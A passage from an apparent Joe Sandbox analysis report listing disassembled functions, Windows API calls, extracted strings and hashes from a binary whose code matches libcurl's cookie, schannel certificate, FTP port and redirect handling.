                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2086B
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E208DD
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E2093F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2096E
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E20992
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00E2126F), ref: 00E20A02
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E20A14
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr$strncmp$callocfclosemalloc$__acrt_iob_func_strrchr_time64
                                    • String ID: #HttpOnly_$%4095[^;=] =%4095[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$=$Added$FALSE$Replaced$TRUE$WARNING: failed to open cookie file "%s"$_$_$__Host-$__Secure-$domain$expires$httponly$localhost$max-age$none$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version$|J$|J
                                    • API String ID: 2930520296-3965322472
                                    • Opcode ID: 35a88eb143828375347474cef641470c3a5ed1061ef908fd24e1971a5e0d2ea7
                                    • Instruction ID: d18d785865ee4231988675f5936b6fae9ac2d427d10a38134725bd8b02a3040c
                                    • Opcode Fuzzy Hash: 35a88eb143828375347474cef641470c3a5ed1061ef908fd24e1971a5e0d2ea7
                                    • Instruction Fuzzy Hash: CD927731A043669FEB299F24FC543A9BBE1AF45314F1461AAD849B32D3DB709CC5CB90
                                    Function 00E43EA4 Relevance: 82.7, APIs: 34, Strings: 13, Instructions: 494encryptionfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E43FA5
                                      • Part of subcall function 00E43BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00E43BC3
                                      • Part of subcall function 00E43BB5: _mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 00E43BE1
                                      • Part of subcall function 00E43BB5: _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00E43CC8
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E58DD4), ref: 00E43FF1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E44092
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 00E440AD
                                    • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E440CA
                                    • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000001,00000000), ref: 00E440F3
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E44109
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44140
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000), ref: 00E44161
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4418D
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E441F4
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000008,?,00000000,00000000,00000001), ref: 00E44214
                                    • PFXImportCertStore.CRYPT32(?,00000000,00000000), ref: 00E4422D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44244
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4427E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E44285
                                    • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00000000,00000000,00000000), ref: 00E442CF
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E442E3
                                    • CertCloseStore.CRYPT32(?,00000000), ref: 00E44301
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E44321
                                    • CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 00E44345
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E44355
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E44380
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E4438C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E443A6
                                    • CryptStringToBinaryA.CRYPT32(?,00000028,00000004,?,00000014), ref: 00E443D5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E443E4
                                    • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,00010000,00000014,00000000), ref: 00E44415
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E44426
                                    • CertCloseStore.CRYPT32(?), ref: 00E44456
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E44470
                                    • CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E4449C
                                    • CertFreeCertificateContext.CRYPT32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E444EC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4452A
                                    Strings
                                    • schannel: certificate format compatibility error for %s, xrefs: 00E44039
                                    • schannel: Failed to get certificate location or file for %s, xrefs: 00E44312
                                    • schannel: Failed to import cert file %s, password is bad, xrefs: 00E44296
                                    • schannel: Failed to open cert store %x %s, last error is 0x%x, xrefs: 00E44363
                                    • schannel: Failed to read cert file %s, xrefs: 00E44123
                                    • schannel: Failed to import cert file %s, last error is 0x%x, xrefs: 00E442B0
                                    • (memory blob), xrefs: 00E4402B, 00E44038, 00E44075
                                    • schannel: Failed to get certificate from file %s, last error is 0x%x, xrefs: 00E442F0
                                    • Microsoft Unified Security Protocol Provider, xrefs: 00E444C8
                                    • Unable to set ciphers to passed via SSL_CONN_CONFIG, xrefs: 00E43F29
                                    • schannel: unable to allocate memory, xrefs: 00E44480
                                    • P12, xrefs: 00E44017
                                    • schannel: AcquireCredentialsHandle failed: %s, xrefs: 00E44506
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$Cert$Store$Certificate$ErrorLast$CloseContextFindFree_mbschrfseekmalloc$BinaryByteCharCryptImportMultiOpenStringWide_mbsnbcmp_strdupcallocfclosefopenfreadftell
                                    • String ID: (memory blob)$Microsoft Unified Security Protocol Provider$P12$Unable to set ciphers to passed via SSL_CONN_CONFIG$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                    • API String ID: 2859572553-531812395
                                    • Opcode ID: de5653140906ebf6595ed67376ba8ad82897ea59ddca61399fc53c476f70e0de
                                    • Instruction ID: 361464431af54708f87089320b89ee97849e01fcf9ed5b5f6ef0a6ef5f3d7593
                                    • Opcode Fuzzy Hash: de5653140906ebf6595ed67376ba8ad82897ea59ddca61399fc53c476f70e0de
                                    • Instruction Fuzzy Hash: 2602D5B1B4072A9FDB249F61EC84BEEB7B8EF04715F1050A9E909B7291DB705E848F50
                                    Function 00E3A8D8 Relevance: 67.1, APIs: 24, Strings: 14, Instructions: 608networkstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3A997
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3A9B5
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 00E3AA1F
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3AA33
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 00E3AA4B
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E3AA5A
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,00000000,0000000A), ref: 00E3AA6B
                                    • getsockname.WS2_32(?,?,?), ref: 00E3AB16
                                    • WSAGetLastError.WS2_32 ref: 00E3AB21
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3ABEA
                                    • WSAGetLastError.WS2_32 ref: 00E3AC18
                                    • htons.WS2_32(?), ref: 00E3AC95
                                    • bind.WS2_32(000000FF,?,00000080), ref: 00E3ACB3
                                    • WSAGetLastError.WS2_32 ref: 00E3ACC1
                                    • getsockname.WS2_32(?,?,00000080), ref: 00E3AD1D
                                    • WSAGetLastError.WS2_32 ref: 00E3AD53
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A0C3
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0CB
                                      • Part of subcall function 00E1A0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A0DD
                                      • Part of subcall function 00E1A0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 00E1A0EC
                                      • Part of subcall function 00E1A0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1A0F6
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A142
                                      • Part of subcall function 00E1A0B8: _strrchr.LIBCMT ref: 00E1A15C
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A173
                                      • Part of subcall function 00E1A0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1A180
                                      • Part of subcall function 00E1A0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E1A188
                                      • Part of subcall function 00E1A0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00E1A193
                                      • Part of subcall function 00E1F3FC: closesocket.WS2_32(00E21EF4), ref: 00E1F433
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3B090
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast$___from_strstr_to_strchr_errno$_strrchrfreegetsocknamestrncpystrtoul$__sys_errlist__sys_nerrbindcallocclosesockethtons
                                    • String ID: %s %s$%s |%d|%s|%hu|$,$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                    • API String ID: 2930231303-3103743990
                                    • Opcode ID: bb8b58bb6cb76a35f0066a0de32f126fb85f3ff02bb2c1c69c2123eb2ad2e177
                                    • Instruction ID: 98ae4584b0a1e7bf03ecece881316f111f5f088aee6fe5bf15cb1e88dcc2bfdb
                                    • Opcode Fuzzy Hash: bb8b58bb6cb76a35f0066a0de32f126fb85f3ff02bb2c1c69c2123eb2ad2e177
                                    • Instruction Fuzzy Hash: 86220871A002189FDB249F24DC99BFE7BB6AB84304F0851B9E849B7181DE724ED4CF61
                                    Function 00E1DEDF Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 278networkstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(if!,?,00000003), ref: 00E1DF9A
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(host!,?,00000005), ref: 00E1DFC9
                                    • inet_pton.WS2_32(00000017,?,?), ref: 00E1E0C2
                                    • inet_pton.WS2_32(00000002,?,?), ref: 00E1E0EB
                                    • htons.WS2_32(?), ref: 00E1E100
                                    • htons.WS2_32(?), ref: 00E1E136
                                    • htons.WS2_32(?), ref: 00E1E18A
                                    • bind.WS2_32(?,?,?), ref: 00E1E1A5
                                    • getsockname.WS2_32(?,?,?), ref: 00E1E1E0
                                    • WSAGetLastError.WS2_32 ref: 00E1E1EA
                                    • WSAGetLastError.WS2_32 ref: 00E1E21C
                                    Strings
                                    • Couldn't bind to interface '%s', xrefs: 00E1DFAB
                                    • host!, xrefs: 00E1DFC4
                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 00E1E07D
                                    • Bind to local port %hu failed, trying next, xrefs: 00E1E177
                                    • bind failed with errno %d: %s, xrefs: 00E1E23B
                                    • Couldn't bind to '%s', xrefs: 00E1E119
                                    • Local port: %hu, xrefs: 00E1E246
                                    • if!, xrefs: 00E1DF95
                                    • getsockname() failed with errno %d: %s, xrefs: 00E1E209
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: htons$ErrorLastinet_ptonstrncmp$bindgetsockname
                                    • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
                                    • API String ID: 2929934046-1901189404
                                    • Opcode ID: b3a3ba6baff0df3a60bf7d37d433f92b939717e87184cd6218b8fbfe6c0a4dd4
                                    • Instruction ID: 83fc7d6db2713e8335a033766370418b68e8dc1f5b0996a096471cfdd722d291
                                    • Opcode Fuzzy Hash: b3a3ba6baff0df3a60bf7d37d433f92b939717e87184cd6218b8fbfe6c0a4dd4
                                    • Instruction Fuzzy Hash: 45A10575A05228AFDB249B24EC59BFA77B8AF09304F145095F84DF7281EB709EC4CB91
                                    Function 00E2C1FD Relevance: 24.4, APIs: 8, Strings: 8, Instructions: 383COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C286
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C446
                                    • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00E2C453
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C46D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C4EB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C508
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C527
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C590
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$atoi
                                    • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
                                    • API String ID: 2493182076-1748258277
                                    • Opcode ID: b67bb2129305673ba5467a772db502592da221870e7483b8097aa3278aba9085
                                    • Instruction ID: e98c7efb01f27881843cdc9281cd98d91a612272a73469dd1810ac74e5f51352
                                    • Opcode Fuzzy Hash: b67bb2129305673ba5467a772db502592da221870e7483b8097aa3278aba9085
                                    • Instruction Fuzzy Hash: C2D15832B44626AFDB28DB74FC817BEB7A4FF45314F34652AE415B3281CB60AC408B90
                                    Function 00E4699F Relevance: 24.2, APIs: 16, Instructions: 160networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00E469C9
                                    • htonl.WS2_32(7F000001), ref: 00E469F0
                                    • setsockopt.WS2_32(00000000,0000FFFF,00000004,?,00000004), ref: 00E46A12
                                    • bind.WS2_32(00000000,?,00000010), ref: 00E46A27
                                    • getsockname.WS2_32(00000000,?,00000010), ref: 00E46A3E
                                    • listen.WS2_32(00000000,00000001), ref: 00E46A59
                                    • socket.WS2_32(00000002,00000001,00000000), ref: 00E46A6F
                                    • connect.WS2_32(00000000,?,00000010), ref: 00E46A86
                                    • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00E46AA5
                                    • accept.WS2_32(00000000,00000000,00000000), ref: 00E46AD6
                                    • getsockname.WS2_32(?,?,00000010), ref: 00E46AF4
                                    • getpeername.WS2_32(?,?,00000010), ref: 00E46B14
                                    • closesocket.WS2_32(00000000), ref: 00E46B41
                                    • closesocket.WS2_32(00000000), ref: 00E46B4C
                                    • closesocket.WS2_32(?), ref: 00E46B54
                                    • closesocket.WS2_32(?), ref: 00E46B5D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: closesocket$getsocknamesocket$acceptbindconnectgetpeernamehtonlioctlsocketlistensetsockopt
                                    • String ID:
                                    • API String ID: 2616969812-0
                                    • Opcode ID: a513652e704dd56b2784afe4283c2834dece6a1ca614b9e35302a9d867012f1a
                                    • Instruction ID: 5899f3e42e1d40c528cb81ac4c3bf8aaf7a2fc33c9436250733558b076b62e77
                                    • Opcode Fuzzy Hash: a513652e704dd56b2784afe4283c2834dece6a1ca614b9e35302a9d867012f1a
                                    • Instruction Fuzzy Hash: 22516F72900609AFDB109FA1EC99BEEBBB9FF09311F605825F601F6190D7709988CB65
                                    Function 00E4CAA0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 562COMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB20
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB42
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4CB9C
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E4CD4F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D01D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4D033
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchrcallocmallocrealloc
                                    • String ID: 0123456789-$<DIR>$APM0123456789:$rwx-tTsS$total
                                    • API String ID: 1091099985-2767756851
                                    • Opcode ID: e049ca0c3de5785565f7a18eb17c97eb502699a8e46584eee14a6986abc77413
                                    • Instruction ID: 190cedfe1f63c7895a311a28282c16b0fa02f37bf2e9ea01d0a826908867e4a8
                                    • Opcode Fuzzy Hash: e049ca0c3de5785565f7a18eb17c97eb502699a8e46584eee14a6986abc77413
                                    • Instruction Fuzzy Hash: 1122EF70A09B029FD768CF29E944B61BBF1FF84318F24961AD056A7B91D735F890CB81
                                    Function 00E14415 Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 381stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,766B1980,00000001), ref: 00E1461F
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1462A
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E1463A
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E14645
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E14650
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E1465D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errno$strtol
                                    • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$0kv@qv@/lv$@#$GMT$\#
                                    • API String ID: 3596500743-2521924296
                                    • Opcode ID: cb741611df9a1dc37f452061bc6c6355bb50552c919d0cffe6dc3444d6c26e86
                                    • Instruction ID: 56a4f97e76f223e8354d5bc59db3eab2db8a99d3e6c3b5516caafc760bc0084b
                                    • Opcode Fuzzy Hash: cb741611df9a1dc37f452061bc6c6355bb50552c919d0cffe6dc3444d6c26e86
                                    • Instruction Fuzzy Hash: C4D16CB1E002199FCB14CFB9D8845EDB7F6AB49328F24662AE525F73D0E7309D818B50
                                    Function 00E4EC10 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 150encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptQueryObject.CRYPT32(00000002,?,00000002,0000000E,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00E4ECEF
                                    • CertAddCertificateContextToStore.CRYPT32(?,?,00000004,00000000), ref: 00E4ED23
                                    • CertFreeCertificateContext.CRYPT32(?), ref: 00E4ED31
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E4ED54
                                    Strings
                                    • schannel: did not add any certificates from CA file '%s', xrefs: 00E4EDCF
                                    • schannel: failed to extract certificate from CA file '%s': %s, xrefs: 00E4ED96
                                    • schannel: added %d certificate(s) from CA file '%s', xrefs: 00E4EDE5
                                    • schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 00E4ED78
                                    • -----END CERTIFICATE-----, xrefs: 00E4EC96
                                    • schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 00E4ED6A
                                    • schannel: CA file '%s' is not correctly formatted, xrefs: 00E4EDAC
                                    • -----BEGIN CERTIFICATE-----, xrefs: 00E4EC65
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
                                    • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
                                    • API String ID: 854292303-665156428
                                    • Opcode ID: 71f183d8b598a55b4b58cecdbcf9205fb86ac677c61d75379f223ddd65822a21
                                    • Instruction ID: d74572a9d67b5f436e7b8ced534ea321c98d9e722e5d540a17ab4de580b0f6a9
                                    • Opcode Fuzzy Hash: 71f183d8b598a55b4b58cecdbcf9205fb86ac677c61d75379f223ddd65822a21
                                    • Instruction Fuzzy Hash: 7B51C271E4022CAFDB289F25EC56FEABBB5FB49710F0055D9F549B2281DA704E808F90
                                    Function 00E4F02B Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 162encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E10B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 00E10B6D
                                      • Part of subcall function 00E10B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00E10B74
                                    • CertGetNameStringA.CRYPT32(?,00000006,00010002,00000000,?,000001B8), ref: 00E4F073
                                    Strings
                                    • schannel: Null certificate info., xrefs: 00E4F0BC
                                    • schannel: Not enough memory to list all host names., xrefs: 00E4F1C3
                                    • schannel: CertFindExtension() returned no extension., xrefs: 00E4F0D8
                                    • 2.5.29.17, xrefs: 00E4F0C9, 00E4F0FD
                                    • schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 00E4F111
                                    • schannel: Null certificate context., xrefs: 00E4F0A3
                                    • schannel: Empty DNS name., xrefs: 00E4F13E
                                    Memory Dump Source
